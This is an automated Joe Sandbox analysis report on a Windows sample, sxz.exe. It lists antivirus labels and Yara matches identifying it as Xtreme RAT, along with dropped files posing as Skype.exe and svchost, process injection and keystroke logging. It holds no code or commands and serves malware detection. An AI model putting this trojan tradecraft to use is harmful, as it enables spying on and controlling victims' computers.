Loading ...

Analysis Report

Overview

General Information

Joe Sandbox Version:22.0.0
Analysis ID:546427
Start time:10:09:44
Joe Sandbox Product:Cloud
Start date:03.05.2018
Overall analysis duration:0h 15m 51s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:sxz.exe
Cookbook file name:default.jbs
Analysis system description:Windows 7 (Office 2010 SP2, Java 1.8.0_40, Flash 16.0.0.305, Acrobat Reader 11.0.08, Internet Explorer 11, Chrome 55, Firefox 43)
Number of analysed new started processes analysed:41
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies
  • HCA enabled
  • EGA enabled
  • HDC enabled
Analysis stop reason:Timeout
Detection:MAL
Classification:mal100.evad.expl.spyw.troj.winEXE@61/225@34/1
HCA Information:Failed
EGA Information:
  • Successful, ratio: 71.4%
HDC Information:
  • Successful, ratio: 66.1% (good quality ratio 64.6%)
  • Quality average: 82.3%
  • Quality standard deviation: 25.4%
Cookbook Comments:
  • Adjust boot time
  • Correcting counters for adjusted boot time
  • Found application associated with file extension: .exe
Warnings:
Show All
  • Exclude process from analysis (whitelisted): conhost.exe, WMIADAP.exe, dllhost.exe
  • Execution Graph export aborted for target explorer.exe, PID 3960 because there are no executed function
  • Report creation exceeded maximum time and may have missing behavior and disassembly information.
  • Report creation exceeded maximum time and may have missing disassembly code information.
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size exceeded maximum capacity and may have missing disassembly code.
  • Report size getting too big, too many NtEnumerateKey calls found.
  • Report size getting too big, too many NtOpenFile calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtQueryDirectoryFile calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
  • Report size getting too big, too many NtReadFile calls found.
  • Report size getting too big, too many NtSetInformationFile calls found.
  • Skipping Hybrid Code Analysis (implementation is based on Java, .Net, VB or Delphi, or parses a document) for: sxz.exe, javaw.exe, java.exe

Detection

StrategyScoreRangeReportingDetection
Threshold1000 - 100Report FP / FNmalicious

Confidence

StrategyScoreRangeFurther Analysis Required?Confidence
Threshold50 - 5false
ConfidenceConfidence


Classification

Analysis Advice

Contains functionality to modify the execution of threads in other processes
Sample drops PE files which have not been started, submit dropped PE samples for a secondary analysis to Joe Sandbox
Sample has a GUI, but Joe Sandbox has not found any clickable buttons, likely more UI automation may extend behavior
Sample has functionality to log and monitor keystrokes, analyze it with the 'Simulates keyboard and window changes' cookbook
Sample monitors Window changes (e.g. starting applications), analyze the sample with the 'Simulates keyboard and window changes' cookbook



Signature Overview

Click to jump to signature section


AV Detection:

barindex
Antivirus detection for dropped fileShow sources
Source: C:\Users\user~1\AppData\Local\Temp\358saxio.exeAvira: Label: DR/Delphi.svunx
Source: C:\Users\user~1\AppData\Local\Temp\Retrive5306090169834682625.vbsAvira: Label: VBS/Agent.281
Source: C:\Users\user~1\AppData\Local\Temp\Retrive4502924618821110619.vbsAvira: Label: VBS/Agent.276
Source: C:\Users\user\AppData\Roaming\Microsoft\Skype.exeAvira: Label: DR/Delphi.svunx
Source: C:\Users\user~1\AppData\Local\Temp\Retrive3783187546293847897.vbsAvira: Label: VBS/Agent.281
Source: C:\Users\user~1\AppData\Local\Temp\server.exeAvira: Label: TR/Spy.59904216
Source: C:\Users\user~1\AppData\Local\Temp\Retrive5899708393590982329.vbsAvira: Label: VBS/Agent.276
Antivirus detection for submitted fileShow sources
Source: sxz.exeAvira: Label: DR/Delphi.wqtni
Multi AV Scanner detection for dropped fileShow sources
Source: C:\Users\user~1\AppData\Local\Temp\358saxio.exevirustotal: Detection: 48%Perma Link
Multi AV Scanner detection for submitted fileShow sources
Source: sxz.exevirustotal: Detection: 43%Perma Link
Antivirus detection for unpacked fileShow sources
Source: 19.1.358saxio.exe.400000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen
Source: 12.0.358saxio.exe.400000.3.unpackAvira: Label: TR/Crypt.XPACK.Gen
Source: 27.1.Server.exe.c80000.0.unpackAvira: Label: TR/Spy.59904216
Source: 5.2.svchost.exe.c80000.6.unpackAvira: Label: TR/Spy.59904216
Source: 3.2.server.exe.c80000.1.unpackAvira: Label: TR/Spy.59904216
Source: 15.0.Server.exe.c80000.0.unpackAvira: Label: TR/Spy.59904216
Source: 2.1.sxz.exe.400000.0.unpackAvira: Label: DR/Injector.toian
Source: 35.2.358saxio.exe.400000.2.unpackAvira: Label: TR/Crypt.XPACK.Gen
Source: 27.2.Server.exe.c80000.1.unpackAvira: Label: TR/Spy.59904216
Source: 15.0.Server.exe.c80000.1.unpackAvira: Label: TR/Spy.59904216
Source: 19.0.358saxio.exe.400000.5.unpackAvira: Label: TR/Crypt.ZPACK.Gen
Source: 3.0.server.exe.c80000.2.unpackAvira: Label: TR/Spy.59904216
Source: 35.0.358saxio.exe.400000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen
Source: 6.2.iexplore.exe.c80000.2.unpackAvira: Label: TR/Spy.59904216
Source: 35.1.358saxio.exe.400000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen
Source: 19.0.358saxio.exe.400000.4.unpackAvira: Label: TR/Crypt.ZPACK.Gen
Source: 6.0.iexplore.exe.c80000.0.unpackAvira: Label: TR/Spy.59904216
Source: 12.2.358saxio.exe.23c0000.3.unpackAvira: Label: TR/Crypt.XPACK.Gen
Source: 2.0.sxz.exe.400000.1.unpackAvira: Label: DR/Injector.toian
Source: 19.2.358saxio.exe.400000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen
Source: 14.1.explorer.exe.1b80000.0.unpackAvira: Label: TR/Spy.59904216
Source: 1.2.sxz.exe.1a40000.3.unpackAvira: Label: DR/Injector.toian
Source: 35.2.358saxio.exe.1440000.3.unpackAvira: Label: TR/Crypt.XPACK.Gen
Source: 3.0.server.exe.c80000.0.unpackAvira: Label: TR/Spy.59904216
Source: 15.1.Server.exe.c80000.0.unpackAvira: Label: TR/Spy.59904216
Source: 1.0.sxz.exe.400000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen
Source: 14.1.explorer.exe.1b80000.1.unpackAvira: Label: TR/Spy.59904216
Source: 35.0.358saxio.exe.400000.1.unpackAvira: Label: TR/Crypt.XPACK.Gen
Source: 27.0.Server.exe.c80000.1.unpackAvira: Label: TR/Spy.59904216
Source: 5.0.svchost.exe.c80000.0.unpackAvira: Label: TR/Spy.59904216
Source: 27.0.Server.exe.c80000.0.unpackAvira: Label: TR/Spy.59904216
Source: 15.0.Server.exe.c80000.2.unpackAvira: Label: TR/Spy.59904216
Source: 2.2.sxz.exe.400000.2.unpackAvira: Label: DR/Injector.toian
Source: 19.0.358saxio.exe.400000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen
Source: 15.2.Server.exe.c80000.1.unpackAvira: Label: TR/Spy.59904216
Source: 12.2.358saxio.exe.400000.2.unpackAvira: Label: TR/Crypt.XPACK.Gen
Source: 12.0.358saxio.exe.400000.2.unpackAvira: Label: TR/Crypt.XPACK.Gen
Source: 2.0.sxz.exe.400000.3.unpackAvira: Label: DR/Injector.toian
Source: 2.0.sxz.exe.400000.2.unpackAvira: Label: DR/Injector.toian
Source: 34.0.iexplore.exe.c80000.0.unpackAvira: Label: TR/Spy.59904216
Source: 15.0.Server.exe.c80000.3.unpackAvira: Label: TR/Spy.59904216
Source: 3.0.server.exe.c80000.3.unpackAvira: Label: TR/Spy.59904216
Source: 34.2.iexplore.exe.c80000.2.unpackAvira: Label: TR/Spy.59904216
Source: 27.0.Server.exe.c80000.3.unpackAvira: Label: TR/Spy.59904216
Source: 3.0.server.exe.c80000.1.unpackAvira: Label: TR/Spy.59904216
Source: 2.0.sxz.exe.400000.5.unpackAvira: Label: DR/Injector.toian
Source: 5.2.svchost.exe.290000.1.unpackAvira: Label: TR/Spy.59904216
Source: 1.2.sxz.exe.400000.2.unpackAvira: Label: TR/Crypt.XPACK.Gen
Source: 12.0.358saxio.exe.400000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen
Source: 27.0.Server.exe.c80000.2.unpackAvira: Label: TR/Spy.59904216
Source: 12.0.358saxio.exe.400000.1.unpackAvira: Label: TR/Crypt.XPACK.Gen
Source: 3.1.server.exe.c80000.0.unpackAvira: Label: TR/Spy.59904216
Source: 35.0.358saxio.exe.400000.2.unpackAvira: Label: TR/Crypt.XPACK.Gen
Source: 2.0.sxz.exe.400000.4.unpackAvira: Label: DR/Injector.toian
Source: 19.0.358saxio.exe.400000.3.unpackAvira: Label: TR/Crypt.XPACK.Gen
Source: 35.0.358saxio.exe.400000.3.unpackAvira: Label: TR/Crypt.XPACK.Gen
Source: 19.0.358saxio.exe.400000.1.unpackAvira: Label: TR/Crypt.XPACK.Gen
Source: 2.0.sxz.exe.400000.0.unpackAvira: Label: DR/Injector.toian
Source: 1.1.sxz.exe.400000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen
Source: 19.0.358saxio.exe.400000.2.unpackAvira: Label: TR/Crypt.XPACK.Gen
Source: 12.1.358saxio.exe.400000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen
Yara signature matchShow sources
Source: 00000003.00000000.14905165956.00C81000.00000020.sdmp, type: MEMORYMatched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 0000000F.00000000.14937698570.00C81000.00000020.sdmp, type: MEMORYMatched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 0000000F.00000002.14989895202.00C81000.00000020.sdmp, type: MEMORYMatched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 0000001B.00000000.15000788791.00C81000.00000020.sdmp, type: MEMORYMatched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 0000000F.00000000.14932929795.00C81000.00000020.sdmp, type: MEMORYMatched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 00000022.00000000.15012281235.00C80000.00000040.sdmp, type: MEMORYMatched rule: Xtreme_Sep17_1 author = Florian Roth, reference = Internal Research, description = Detects XTREME sample analyzed in September 2017, date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6
Source: 00000022.00000000.15012281235.00C80000.00000040.sdmp, type: MEMORYMatched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 00000003.00000001.14905808954.00C81000.00000020.sdmp, type: MEMORYMatched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 0000000E.00000001.14937243423.01B81000.00000020.sdmp, type: MEMORYMatched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 00000003.00000002.14987723130.00C81000.00000020.sdmp, type: MEMORYMatched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 0000001B.00000001.15007151931.00C81000.00000020.sdmp, type: MEMORYMatched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 0000001B.00000000.15001441864.00C81000.00000020.sdmp, type: MEMORYMatched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 00000005.00000002.15179880413.00C80000.00000040.sdmp, type: MEMORYMatched rule: Xtreme_Sep17_1 author = Florian Roth, reference = Internal Research, description = Detects XTREME sample analyzed in September 2017, date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6
Source: 00000005.00000002.15179880413.00C80000.00000040.sdmp, type: MEMORYMatched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 0000001B.00000000.14999659592.00C81000.00000020.sdmp, type: MEMORYMatched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 00000006.00000002.14955870384.00C80000.00000040.sdmp, type: MEMORYMatched rule: Xtreme_Sep17_1 author = Florian Roth, reference = Internal Research, description = Detects XTREME sample analyzed in September 2017, date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6
Source: 00000006.00000002.14955870384.00C80000.00000040.sdmp, type: MEMORYMatched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 0000000F.00000000.14944848932.00C81000.00000020.sdmp, type: MEMORYMatched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 00000005.00000002.15177862719.00290000.00000004.sdmp, type: MEMORYMatched rule: Xtreme_Sep17_1 author = Florian Roth, reference = Internal Research, description = Detects XTREME sample analyzed in September 2017, date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6
Source: 00000005.00000002.15177862719.00290000.00000004.sdmp, type: MEMORYMatched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 0000000F.00000000.14950318636.00C81000.00000020.sdmp, type: MEMORYMatched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 0000000F.00000001.14957378618.00C81000.00000020.sdmp, type: MEMORYMatched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 00000006.00000000.14913253676.00C80000.00000040.sdmp, type: MEMORYMatched rule: Xtreme_Sep17_1 author = Florian Roth, reference = Internal Research, description = Detects XTREME sample analyzed in September 2017, date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6
Source: 00000006.00000000.14913253676.00C80000.00000040.sdmp, type: MEMORYMatched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 00000003.00000000.14904035142.00C81000.00000020.sdmp, type: MEMORYMatched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 0000000E.00000001.14936774837.01B81000.00000020.sdmp, type: MEMORYMatched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 0000001B.00000002.15035469105.00C81000.00000020.sdmp, type: MEMORYMatched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 00000003.00000000.14905430148.00C81000.00000020.sdmp, type: MEMORYMatched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 00000003.00000000.14904944731.00C81000.00000020.sdmp, type: MEMORYMatched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 00000005.00000000.14909911900.00C80000.00000040.sdmp, type: MEMORYMatched rule: Xtreme_Sep17_1 author = Florian Roth, reference = Internal Research, description = Detects XTREME sample analyzed in September 2017, date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6
Source: 00000005.00000000.14909911900.00C80000.00000040.sdmp, type: MEMORYMatched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 0000001B.00000000.15004091676.00C81000.00000020.sdmp, type: MEMORYMatched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 00000022.00000002.15021754459.00C80000.00000040.sdmp, type: MEMORYMatched rule: Xtreme_Sep17_1 author = Florian Roth, reference = Internal Research, description = Detects XTREME sample analyzed in September 2017, date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6
Source: 00000022.00000002.15021754459.00C80000.00000040.sdmp, type: MEMORYMatched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: C:\Windows\InstallDir\Server.exe, type: DROPPEDMatched rule: Xtreme_Sep17_1 author = Florian Roth, reference = Internal Research, description = Detects XTREME sample analyzed in September 2017, date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6
Source: C:\Windows\InstallDir\Server.exe, type: DROPPEDMatched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: C:\Users\user~1\AppData\Local\Temp\server.exe, type: DROPPEDMatched rule: Xtreme_Sep17_1 author = Florian Roth, reference = Internal Research, description = Detects XTREME sample analyzed in September 2017, date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6
Source: C:\Users\user~1\AppData\Local\Temp\server.exe, type: DROPPEDMatched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 34.0.iexplore.exe.c80000.0.raw.unpack, type: UNPACKEDPEMatched rule: Xtreme_Sep17_1 author = Florian Roth, reference = Internal Research, description = Detects XTREME sample analyzed in September 2017, date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6
Source: 34.0.iexplore.exe.c80000.0.raw.unpack, type: UNPACKEDPEMatched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 27.1.Server.exe.c80000.0.unpack, type: UNPACKEDPEMatched rule: Xtreme_Sep17_1 author = Florian Roth, reference = Internal Research, description = Detects XTREME sample analyzed in September 2017, date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6
Source: 27.1.Server.exe.c80000.0.unpack, type: UNPACKEDPEMatched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 3.2.server.exe.c80000.1.unpack, type: UNPACKEDPEMatched rule: Xtreme_Sep17_1 author = Florian Roth, reference = Internal Research, description = Detects XTREME sample analyzed in September 2017, date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6
Source: 3.2.server.exe.c80000.1.unpack, type: UNPACKEDPEMatched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 15.0.Server.exe.c80000.0.unpack, type: UNPACKEDPEMatched rule: Xtreme_Sep17_1 author = Florian Roth, reference = Internal Research, description = Detects XTREME sample analyzed in September 2017, date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6
Source: 15.0.Server.exe.c80000.0.unpack, type: UNPACKEDPEMatched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 5.2.svchost.exe.c80000.6.unpack, type: UNPACKEDPEMatched rule: Xtreme_Sep17_1 author = Florian Roth, reference = Internal Research, description = Detects XTREME sample analyzed in September 2017, date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6
Source: 5.2.svchost.exe.c80000.6.unpack, type: UNPACKEDPEMatched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 15.0.Server.exe.c80000.1.unpack, type: UNPACKEDPEMatched rule: Xtreme_Sep17_1 author = Florian Roth, reference = Internal Research, description = Detects XTREME sample analyzed in September 2017, date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6
Source: 15.0.Server.exe.c80000.1.unpack, type: UNPACKEDPEMatched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 3.0.server.exe.c80000.2.unpack, type: UNPACKEDPEMatched rule: Xtreme_Sep17_1 author = Florian Roth, reference = Internal Research, description = Detects XTREME sample analyzed in September 2017, date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6
Source: 3.0.server.exe.c80000.2.unpack, type: UNPACKEDPEMatched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 6.0.iexplore.exe.c80000.0.unpack, type: UNPACKEDPEMatched rule: Xtreme_Sep17_1 author = Florian Roth, reference = Internal Research, description = Detects XTREME sample analyzed in September 2017, date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6
Source: 6.0.iexplore.exe.c80000.0.unpack, type: UNPACKEDPEMatched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 27.2.Server.exe.c80000.1.unpack, type: UNPACKEDPEMatched rule: Xtreme_Sep17_1 author = Florian Roth, reference = Internal Research, description = Detects XTREME sample analyzed in September 2017, date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6
Source: 27.2.Server.exe.c80000.1.unpack, type: UNPACKEDPEMatched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 6.2.iexplore.exe.c80000.2.unpack, type: UNPACKEDPEMatched rule: Xtreme_Sep17_1 author = Florian Roth, reference = Internal Research, description = Detects XTREME sample analyzed in September 2017, date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6
Source: 6.2.iexplore.exe.c80000.2.unpack, type: UNPACKEDPEMatched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 5.2.svchost.exe.c80000.6.raw.unpack, type: UNPACKEDPEMatched rule: Xtreme_Sep17_1 author = Florian Roth, reference = Internal Research, description = Detects XTREME sample analyzed in September 2017, date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6
Source: 5.2.svchost.exe.c80000.6.raw.unpack, type: UNPACKEDPEMatched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 14.1.explorer.exe.1b80000.0.unpack, type: UNPACKEDPEMatched rule: Xtreme_Sep17_1 author = Florian Roth, reference = Internal Research, description = Detects XTREME sample analyzed in September 2017, date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6
Source: 14.1.explorer.exe.1b80000.0.unpack, type: UNPACKEDPEMatched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 3.0.server.exe.c80000.0.unpack, type: UNPACKEDPEMatched rule: Xtreme_Sep17_1 author = Florian Roth, reference = Internal Research, description = Detects XTREME sample analyzed in September 2017, date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6
Source: 3.0.server.exe.c80000.0.unpack, type: UNPACKEDPEMatched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 15.1.Server.exe.c80000.0.unpack, type: UNPACKEDPEMatched rule: Xtreme_Sep17_1 author = Florian Roth, reference = Internal Research, description = Detects XTREME sample analyzed in September 2017, date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6
